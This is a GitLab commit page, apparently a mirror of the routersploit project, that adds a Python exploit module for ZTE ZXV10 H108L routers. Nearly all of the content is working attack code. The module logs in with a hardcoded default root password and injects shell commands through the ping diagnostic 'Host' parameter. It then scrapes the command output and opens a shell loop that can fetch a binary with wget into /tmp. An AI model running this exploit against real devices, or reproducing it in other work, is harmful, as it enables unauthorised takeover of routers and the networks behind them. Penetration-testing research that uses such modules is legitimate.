Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
b12c7031
Commit
b12c7031
authored
Aug 23, 2016
by
Marcin Bury
Committed by
GitHub
Aug 23, 2016
Browse files
Options
Browse Files
Download
Plain Diff
Merge pull request #127 from stasinopoulos/patch-2
Added zxv10_rce exploit
parents
b71bbd9d
c9b4ce7e
Show whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
151 additions
and
0 deletions
+151
-0
zxv10_rce.py
routersploit/modules/exploits/zte/zxv10_rce.py
+151
-0
No files found.
routersploit/modules/exploits/zte/zxv10_rce.py
0 → 100644
View file @
b12c7031
import
re
import
time
import
requests
from
routersploit
import
(
exploits
,
http_request
,
mute
,
validators
,
print_error
,
print_success
,
print_status
,
print_info
,
shell
,
)
class
Exploit
(
exploits
.
Exploit
):
"""
Exploit implementation for ZTE ZXV10 H108L remote code execution vulnerability.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__
=
{
'name'
:
'ZTE ZXV10 RCE'
,
'description'
:
'Exploits ZTE ZXV10 H108L remote code execution vulnerability that allows executing commands on operating system level.'
,
'authors'
:
[
'Anastasios Stasinopoulos'
,
# vulnerabiltiy discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>'
,
# routersploit module
],
'references'
:
[
'https://github.com/stasinopoulos/ZTExploit/'
,
],
'devices'
:
[
'ZTE ZXV10 H108L'
,
],
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
,
validators
=
validators
.
url
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
username
=
exploits
.
Option
(
'root'
,
'Username to log in with'
)
password
=
exploits
.
Option
(
'W!n0&oO7.'
,
'Password to log in with'
)
session
=
None
def
__init__
(
self
):
self
.
session
=
requests
.
Session
()
def
run
(
self
):
if
self
.
login
():
print_success
(
"Target seems to be vulnerable"
)
self
.
info
()
print_status
(
"Invoking command loop"
)
shell
(
self
,
architecture
=
"mips"
,
method
=
"wget"
,
binary
=
"wget"
,
location
=
"/tmp"
)
else
:
print_error
(
"Exploit failed - target seems to be not vulnerable"
)
def
execute
(
self
,
cmd
):
path
=
"/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit"
.
format
(
cmd
)
url
=
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
path
)
try
:
response
=
self
.
session
.
get
(
url
)
time
.
sleep
(
3
)
url
=
"{}:{}/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch"
.
format
(
self
.
target
,
self
.
port
)
response
=
self
.
session
.
get
(
url
)
time
.
sleep
(
1
)
res
=
re
.
findall
(
r'textarea_1">(.*) -c'
,
response
.
text
)
if
len
(
res
):
return
res
[
0
]
else
:
res1
=
re
.
findall
(
r'textarea_1">(.*)'
,
response
.
text
)
if
res1
[
0
]
==
"-c 1 -s 64"
:
return
""
else
:
res2
=
re
.
findall
(
r'(.*) -c'
,
response
.
text
)
res
=
res1
+
res2
if
res
[
0
]
!=
"</textarea>"
:
return
res
[
0
]
except
:
pass
return
""
def
info
(
self
):
url
=
"{}:{}/template.gch"
.
format
(
self
.
target
,
self
.
port
)
try
:
response
=
self
.
session
.
get
(
url
)
except
:
return
# Check for Model Name
Frm_ModelName
=
re
.
findall
(
r'Frm_ModelName" class="tdright">(.*)<'
,
response
.
text
)
if
len
(
Frm_ModelName
):
print_status
(
"Model Name: {}"
.
format
(
Frm_ModelName
[
0
]))
# Check for Serial Number
Frm_SerialNumber
=
re
.
findall
(
r'Frm_SerialNumber" class="tdright">(.*)'
,
response
.
text
)
if
len
(
Frm_SerialNumber
):
print_status
(
"Serial Number: {}"
.
format
(
Frm_SerialNumber
[
0
]))
# Check for Hardware Version
Frm_HardwareVer
=
re
.
findall
(
r'Frm_HardwareVer" class="tdright">(.*)<'
,
response
.
text
)
if
len
(
Frm_HardwareVer
):
print_status
(
"Software Version: {}"
.
format
(
Frm_HardwareVer
[
0
]))
# Check for Boot Loader Version
Frm_BootVer
=
re
.
findall
(
r'Frm_BootVer" class="tdright">(.*)<'
,
response
.
text
)
if
len
(
Frm_BootVer
):
print_status
(
"Boot Loader Version: {}"
.
format
(
Frm_BootVer
[
0
]))
def
login
(
self
):
url
=
"{}:{}/"
.
format
(
self
.
target
,
self
.
port
)
try
:
response
=
self
.
session
.
get
(
url
=
url
)
if
response
is
None
:
return
print_status
(
"Retrieving random login token..."
)
Frm_Logintoken
=
re
.
findall
(
r'Frm_Logintoken"\).value = "(.*)";'
,
response
.
text
)
if
len
(
Frm_Logintoken
):
Frm_Logintoken
=
Frm_Logintoken
[
0
]
print_status
(
"Trying to log in with credentials {} : {}"
.
format
(
self
.
username
,
self
.
password
))
url
=
"{}:{}/login.gch"
.
format
(
self
.
target
,
self
.
port
)
data
=
{
"Frm_Logintoken"
:
Frm_Logintoken
,
"Username"
:
self
.
username
,
"Password"
:
self
.
password
}
response
=
self
.
session
.
post
(
url
,
data
=
data
)
if
"Username"
not
in
response
.
text
and
"Password"
not
in
response
.
text
:
print_success
(
"Successful authentication"
)
return
True
except
:
pass
return
False
@mute
def
check
(
self
):
if
self
.
login
():
return
True
# target is vulnerable
return
False
# target is not vulnerable
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment
